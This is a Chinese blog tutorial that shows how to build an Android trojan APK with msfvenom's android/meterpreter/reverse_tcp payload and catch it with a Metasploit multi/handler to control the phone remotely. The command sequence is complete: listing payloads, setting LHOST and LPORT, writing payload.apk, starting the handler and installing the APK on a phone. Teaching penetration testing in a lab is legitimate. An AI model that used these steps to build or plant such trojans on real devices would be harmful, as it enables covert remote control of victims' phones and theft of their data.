meterpreter命令详解教程(Meterpreter Android植入木马)

2022.02.24 - 作者:小小课堂网 - 阅 1,694 推荐

meterpreter命令详解教程，在Metasploit软件中，使用msfvenom命令创建被控制端payload，使用msfconsole命令启动主控制端Meterpreter，被控端payload运行，最后利用Meterpreter输入控制指令完成对被控端的远程控制。今天，小小课堂网（ xxkt.org.cn ）分享的是《meterpreter命令详解教程(Meterpreter Android系统植入木马)》。希望对大家有所帮助。

一、msfvenom生成被控端文件

Android系统需要生成apk文件，选择一个payload，设置参数，输出格式，输出位置。

1、查找适合Android的payload

msfvenom -l payloads

执行命令查看所有payloads，找到可以在Android运行的。payload说明：

payload说明

从name可以看出，我们需要选择一个Android/meterpreter/的payload，我们还是以tcp作为实例，那么就选择

Android/meterpreter/reverse_tcp

适用于Android系统的，采用meterpreter进行控制的，基于tcp的反向木马。首先查询一下这个payload的用法：

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

options

Android/meterpreter/reverse_tcp参数说明：

Android/meterpreter/reverse_tcp参数说明

只需要设置主控电脑的ip和端口即可，端口随意，可以更改，也可以默认，ip直接命令查看kali linux的即可。

ip add show eth0

kali linux系统ip查询：

kali linux系统ip查询

2、设置payload参数

set命令设置payload参数，如下：

set lhost 192.168.130.6

set lport 8888

设置payload参数

3、输出被控端程序

确定好输出位置为kali linux桌面，/home/kali/Desktop/。

因为默认的程序类型中没有apk，所以不能像windows系统那样再使用-f exe的形式。这里需要使用的是保持文件原始格式的参数“R>”，并且这个参数也会直接指定位置，不需要再使用-o来指定输出位置。

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.130.6 lport=8888 R>/home/kali/Desktop/payload.apk

输出被控端程序文件：

输出被控端程序

二、msfconsole启动主控端

我们在kali linux中启动metasploit，命令如下：

msfconsole

然后，主控端采用的Handler，handler包含3个参数：

被控端程序使用的payload

被控端程序使用的payload所用的IP

被控端程序使用的payload所用的端口

然后set设置一下即可，貌似在前面，我们查看参数的时候已经都设置好了。

那么我们直接启动并且用options进行查看就好。

发现正确之后，我们直接开启主控：

exploit

开启主控：

开启主控

三、手机安装payload.apk

把之前生成的payload.apk传输到测试手机上，安装到手机上。按照上述过程生成的payload.apk在安装中报毒，而且在现在的高版本安卓机上会存在不确定的兼容性问题，提示“低版本可能无法运行”。

四、进入meterpreter控制

如果找到低版本适合的手机，就已经可以进入meterpreter控制了。

以上就是小小课堂网（ xxkt.org.cn ）分享的是《meterpreter命令详解教程(Meterpreter Android系统植入木马)》。感谢您的阅读。

本文最后一次更新时间：2022年2月28日

随机文章

seo新人培训
 301重定向是什么意思(301跳转怎么做怎么设置)
seo文章关键词布局(seo关键词布局技巧)
SEO研究中心权重传递实战(老站点搬到二级域名)
南通seo培训(网站运营管理)
小小课堂SEO自学网（切记熊掌号SEO仅面向移动端优质页面）
小小课堂SEO自学网(百中seo顾问服务)
网站排名下降原因(百度网站优化排名中突然被降权)

本文《meterpreter命令详解教程(Meterpreter Android植入木马)》由小小课堂网整理或原创，侵删，欢迎转载并保留版权：https://xxkt.org.cn/ 感谢您的阅读。

本站提供SEO培训、咨询、诊断，QQ：2216876660 微信：huowuyan 公众号：小小课堂网

标签：Android植入木马，meterpreter，meterpreter命令，meterpreter命令详解，meterpreter教程

相关文章！

Metasploit、payload与meterpreter应用
02.24 - 阅 1,137 推荐

msfvenom生成被控端程序，是基于Metasploit中提供的windows/meterpreter/re […]
被ddos攻击报警有用么(为什么会有ddos攻击)
04.11 - 阅 877 推荐

被ddos攻击报警有用么？首先ddos攻击别人是违法行为，想要溯源比较麻烦，不过主要还是看网警帮不帮你弄，报警 […]
fofa搜索fofa语法(网络空间安全搜索引擎Fofa查询)
02.26 - 阅 3,991 推荐

FoFa.so被列入黑名单。目前网站没办法访问了。fofa搜索fofa语法。在fofa.so，我们通过搜索可以 […]
Google hacking语法(google hacking技术手册)
02.26 - 阅 2,242 推荐

Google hacking语法详解。Google hack是hacker利用搜索引擎来搜集web信息的方法。 […]
使用burpsuite抓包(kali下Burp Suite抓包app教程)
02.25 - 阅 2,262 推荐

使用burpsuite抓包，Burp Suite进行app本来是很简单的一件事，但却因为测试环境为kali l […]
一句话图片木马制作(图片中插入一句话木马)
02.25 - 阅 2,542 推荐

一句话图片木马制作，很多时候，无法上传php或者asp类型的文件时，一句话图片木马可能就能排上用途了。今天，小 […]
无后门菜刀下载(推荐使用中国菜刀无后门版)
02.25 - 阅 3,209 推荐

无后门菜刀下载，菜刀是连接shell的工具，方便服务器的文件管理。今天，小小课堂网（ xxkt.org.cn […]
渗透测试工程师是做什么的(渗透测试工程师需要学什么)
02.25 - 阅 1,367 推荐

渗透测试工程师是做什么的？渗透测试需要学习什么？如何能更快掌握渗透测试技术呢？今天，小小课堂网（ xxkt.o […]
WEB解析漏洞(IIS、Apache和PHP CGI解析漏洞)
02.25 - 阅 983 推荐

WEB解析漏洞，攻击者在利用上传漏洞时，通常会与web容器的解析漏洞配合在一起。所以我们首先来了解一下解析漏洞 […]

error: Content is protected !!